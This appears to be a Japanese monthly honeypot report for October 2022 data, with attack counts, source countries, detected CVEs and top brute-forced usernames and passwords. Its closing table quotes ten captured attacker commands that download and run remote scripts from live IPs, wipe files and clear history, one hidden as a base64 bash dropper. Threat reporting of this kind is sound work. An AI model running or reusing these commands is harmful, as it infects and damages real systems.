ハニーポット運用(月次報告:2022年11月)
今月のTopics
1.SECCON CTF 2022 予選 の開催
・2022年11月12日(土) 14:00 (JST) ~ 2022年11月13日(日) 14:00 (JST)
で開催された SECCON CTF 2022 予選
に参加した。例年通り全く解けず、潔く撃沈。
・所属先のチームとしては精鋭の方々が問題をたくさん解かれて決勝にも行く模様だ...
・所属先の会社がいつの間にかスポンサーになっており、驚きを隠せない。
2.「Citrix ADC」「Citrix Gateway」の脆弱性報告
Citrix Systems社の「Citrix ADC」「Citrix Gateway」にて深刻な脆弱性が報告された。
脆弱性は3件(CVE-2022-27510、CVE-2022-27513、CVE-2022-27516)あるとのこと。
CVE番号 | 概要 |
---|---|
CVE-2022-27510 | ゲートウェイにおいて認証のバイパスが可能となり、不正アクセスが可能となる脆弱性 |
CVE-2022-27513 | RDPプロキシ機能を設定した際に、フィッシング攻撃によってリモートデスクトップを乗っ取られるおそれがある脆弱性 |
CVE-2022-27516 | ブルートフォース攻撃の保護機能を回避できる脆弱性 |
早急な更新バージョンへのアップデートがメーカーより呼びかけられている。
support.citrix.com
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2022年10月1日-2022年10月31日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No | ハニーポット | 件数 | 先月比 |
---|---|---|---|
1 | Cowrie | 1,238,772 | 191,033 |
2 | Ddospot | 864,855 | ▲417,561 |
3 | Heralding | 726,075 | ▲60,013 |
4 | Honeytrap | 436,268 | ▲131,155 |
5 | Dionaea | 262,128 | ▲10,406 |
6 | Mailoney | 39,705 | 20,465 |
7 | Adbhoney | 20,693 | 2,678 |
8 | CitrixHoneypot | 5,605 | 3,839 |
9 | Ciscoasa | 5,588 | 3,448 |
10 | Tanner | 4,115 | ▲1,471 |
11 | ConPot | 2,801 | 40 |
12 | Redishoneypot | 2,366 | ▲295 |
13 | ElasticPot | 865 | ▲1,107 |
14 | Ipphoney | 184 | ▲31 |
15 | Dicompot | 76 | ▲24 |
- Result
- DDos関連のアクセスが減少し、ssh関連のアクセスが多い傾向があった。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
No | 攻撃元の国名 | 件数 | 先月順位 |
---|---|---|---|
1 | Russia | 622,598 | 2(↑) |
2 | Brazil | 509,899 | 1(↓) |
3 | United States | 405,576 | 3(→) |
4 | Netherlands | 250,453 | 5(↑) |
5 | China | 230,897 | 4(↓) |
6 | France | 105,541 | 6(→) |
7 | Turkey | 92,642 | 圏外(↑) |
8 | Japan | 88,621 | 9(↑) |
9 | Germany | 80,874 | 13(↑) |
10 | Vietnam | 77,841 | 11(↑) |
11 | United Kingdom | 76,021 | 7(↓) |
12 | India | 73,370 | 8(↓) |
13 | Paraguay | 69,753 | 圏外(↑) |
14 | Singapore | 60,598 | 10(↓) |
15 | Egypt | 52,966 | 圏外(↑) |
16 | South Korea | 45,498 | 14(↓) |
17 | Panama | 39,963 | 16(↓) |
18 | Indonesia | 38,750 | 15(↓) |
19 | Bangladesh | 36,491 | 圏外(↑) |
20 | Sweden | 31,260 | 12(↓) |
- Result
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No | CVE ID | Count |
---|---|---|
1 | CVE-2020-11899 | 494,684 |
2 | CVE-2020-11910 | 22 |
3 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 4 |
- Result
- 先月から変更なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No | ユーザ名 | 件数 |
---|---|---|
1 | root | 90,663 |
2 | admin | 6,416 |
3 | user | 5,131 |
4 | test | 4,419 |
5 | postgres | 4,273 |
6 | nproc | 3,200 |
7 | hadoop | 2,314 |
8 | mysql | 2,279 |
9 | (empty) | 2,128 |
10 | ubuntu | 1,944 |
11 | git | 1,497 |
12 | oracle | 1,459 |
13 | sa | 1,448 |
14 | 22 | 1,236 |
15 | ftpuser | 1,213 |
16 | guest | 1,162 |
17 | steam | 1,087 |
18 | centos | 782 |
19 | support | 699 |
20 | 2Wire | 619 |
21 | !root | 606 |
22 | testuser | 581 |
23 | www | 489 |
24 | es | 463 |
25 | jenkins | 441 |
26 | ftp | 440 |
27 | devops | 436 |
28 | ansible | 429 |
29 | tester | 417 |
30 | vagrant | 416 |
31 | esuser | 386 |
32 | zjw | 382 |
33 | pi | 377 |
34 | 666666 | 359 |
35 | ansadmin | 357 |
36 | ec2-user | 343 |
37 | adm | 322 |
38 | 0 | 319 |
39 | cameras | 319 |
40 | debug | 319 |
41 | unknown | 319 |
42 | blank | 313 |
43 | $ALOC$ | 304 |
44 | dmdba | 303 |
45 | elastic | 299 |
46 | student | 264 |
47 | dev | 261 |
48 | emqx | 250 |
49 | minecraft | 236 |
50 | Admin | 233 |
- Result
- 先月から変更なし
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No | パスワード | 件数 |
---|---|---|
1 | 123456 | 7,409 |
2 | (empty) | 3,324 |
3 | nproc | 3,200 |
4 | admin | 2,392 |
5 | 1234 | 1,629 |
6 | password | 1,608 |
7 | 123 | 1,219 |
8 | 12345678 | 1,093 |
9 | 12345 | 1,077 |
10 | root | 987 |
11 | blank | 926 |
12 | test | 698 |
13 | 0 | 665 |
14 | 1 | 664 |
15 | user | 640 |
16 | test123 | 584 |
17 | 1qaz@WSX | 547 |
18 | ubnt | 534 |
19 | 00000000 | 468 |
20 | Test1234 | 468 |
21 | P@ssw0rd | 456 |
22 | 1qaz2wsx | 451 |
23 | support | 450 |
24 | 666666 | 449 |
25 | test1234 | 439 |
26 | password123 | 437 |
27 | Test123 | 428 |
28 | alpine | 375 |
29 | passw0rd | 370 |
30 | hi3518 | 363 |
31 | Password123 | 336 |
32 | Passw0rd | 332 |
33 | master | 321 |
34 | Test1 | 320 |
35 | 10023 | 316 |
36 | backup | 314 |
37 | cameras | 314 |
38 | synnet | 310 |
39 | unknown | 310 |
40 | _Cisco | 306 |
41 | !ishtar | 296 |
42 | admin123 | 294 |
43 | test1 | 281 |
44 | Aa123456 | 277 |
45 | 1234567890 | 263 |
46 | abc123 | 254 |
47 | 123123 | 242 |
48 | !qazzaq! | 231 |
49 | 123456789 | 222 |
50 | 111111 | 176 |
- Result
- 今月は数字の羅列のパスワードが全体的に多い傾向にあった。
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
- shファイルとexeファイル関連の問い合わせは以下の通り。
◆shファイルに関するアクセス
No | ファイル名 | hash値(md5) | アクセス |
---|---|---|---|
1 | - | - | uname -a;wget -q -O- http://185.161.208.234/test.jpg|perl;wget -q http://185.161.208.234/xxqrzmr.tgz;tar zvxf xxqrzmr.tgz;rm -rf xx;cd .yum-track-qrcommon;chmod +x ;sh sh;nproc;history -c |
2 | 774.sh | - | cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh |
3 | 774.sh | - | rm -rf sh; wget http://194.180.48.55/sh || curl -O http://194.180.48.55/sh || tftp 194.180.48.55 -c get sh || tftp -g -r sh 194.180.48.55; chmod 777 sh;./sh ssh; rm -rf sh |
4 | ohshit.sh | 180be9d2fbb747c591d2924ac0b98f62 | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://92.87.6.205/ohshit.sh; curl -O http://92.87.6.205/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 92.87.6.205 -c get ohshit1.sh; chmod 777 ohshit1.sh; sh ohshit1.sh; tftp -r ohshit2.sh -g 92.87.6.205; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 92.87.6.205 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit2.sh ohshit1.sh; rm -rf * |
5 | - | - | sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApybSAtcmYgLlgxOS11bml4Cm1rZGlyIC5YMTktdW5peApjZCAuWDE5LXVuaXgKbXYgL3Zhci90bXAvZG90YTMudGFyLmd6IGRvdGEzLnRhci5negp0YXIgeGYgZG90YTMudGFyLmd6CnNsZWVwIDNzICYmIGNkIC90bXAvLlgxOS11bml4Ly5yc3luYy9jCm5vaHVwIC90bXAvLlgxOS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxOTIuMTY4ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDhtICYmIG5vaHVwIC90bXAvLlgxOS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxNzIuMTYgPj4gL2Rldi9udWxsIDI+MSYKc2xlZXAgMjBtICYmIGNkIC4uOyAvdG1wLy5YMTktdW5peC8ucnN5bmMvaW5pdGFsbCAyPjEmCmV4aXQgMA==" | base64 --decode | bash |
6 | gay | - | chmod 777 gay;./gay ;chmod 777 sshddnig; ./sshddnig ssh.mips.echo; rm -rf gay; rm -rf sshddnig |
7 | - | - | >/data/local/tmp/.x && cd /data/local/tmp; >/sdcard/0/Downloads/.x && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wget bwget bcurl curl; wget http://45.61.188.83/wget; sh wget; busybox wget http://45.61.188.83/bwget; sh bwget; busybox curl http://45.61.188.83/bcurl > bcurl; sh bcurl; curl http://45.61.188.83/curl > curl; sh curl |
8 | c.sh | - | cd /data/local/tmp/; busybox wget http://host.chxv8ybuh2ytmfvfwrulcdqtywlooiybaevwsa2b.org/w.sh; sh w.sh; curl http://host.chxv8ybuh2ytmfvfwrulcdqtywlooiybaevwsa2b.org/c.sh; sh c.sh |
9 | 34750f03237595d58567332a2346a23c | 34750f03237595d58567332a2346a23c | cd /tmp ; wget 109.239.57.240/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 109.239.57.240/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c |
10 | Dynabins.sh | - | cd /tmp || cd /run || cd /; wget http://3.90.219.71/Dynabins.sh; chmod 777 Dynabins.sh; sh Dynabins.sh; tftp 3.90.219.71 -c get Dynatftp1.sh; chmod 777 Dynatftp1.sh; sh Dynatftp1.sh; tftp -r Dynatftp2.sh -g 3.90.219.71; chmod 777 Dynatftp2.sh; sh Dynatftp2.sh; rm -rf Dynabins.sh Dynatftp1.sh Dynatftp2.sh; rm -fr * |
◆exeファイルに関するアクセス
- 無し
今月の作業BGM
曲名 | アーティスト | 備考 |
---|---|---|
Never Enough | Loren Allred | --- |